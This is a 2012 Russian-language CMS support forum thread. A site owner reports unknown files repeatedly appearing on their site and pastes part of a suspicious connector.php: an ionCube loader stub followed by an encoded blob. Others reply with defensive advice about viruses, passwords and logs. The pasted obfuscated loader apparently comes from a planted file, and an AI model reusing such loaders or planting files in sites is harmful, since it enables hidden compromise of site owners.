Page 1 of 1

Дырка в CMS или не в CMS ?

Posted: Thu Jun 14, 2012 5:14 pm
by proton
Второй раз ,за три месяца существования сайта на CMSMS, появляются папка include с файлами,файл connector.php в корне сайта и один раз был как бы затерт родной config.php другим.(другого владельца) При этом сайт перестает работать.После удаления этих файлов работоспособность сайта восстанавливается.Права выставлены по 022 .Кто -нибудь сталкивался с подобным?Часть кода connector.php

Code: Select all

<?php //003ab
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');@dl($__ln);if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
4+oV5BQDA2+eN940eKAz3BvhlV76QXpnVJasMlSszLa07gQM9VtaI5AvLdd9hJy6NlHQ1obLInfI

Re: Дырка в CMS или не в CMS ?

Posted: Thu Jun 14, 2012 6:21 pm
by Fenik17
Ищите на своем компе вирусы, меняйте пароли к сайту.

Re: Дырка в CMS или не в CMS ?

Posted: Tue Jun 19, 2012 6:05 am
by proton
Ищите на своем компе вирусы, меняйте пароли к сайту.
Если был бы прямой доступ к сайту стороннего через вирус или пароль, то наверно дел натворилось бы больше.Здесь вероятно причина и лазейка в чем-то другом.Знание PHP помогло бы в решении этой задачи, но увы.

Re: Дырка в CMS или не в CMS ?

Posted: Tue Jun 19, 2012 7:18 am
by Fenik17
Если бы, да кабы..
Логи посмотреть кто мешает?

Re: Дырка в CMS или не в CMS ?

Posted: Sat Jun 23, 2012 3:09 pm
by proton
Если бы, да кабы..
Логи посмотреть кто мешает?
Увы , логи не сохранились на те дни.Прошелся AVASTом , он убрал два подозрительных файла на компе.Вполне возможно от них эта пляска.
ОКею ок.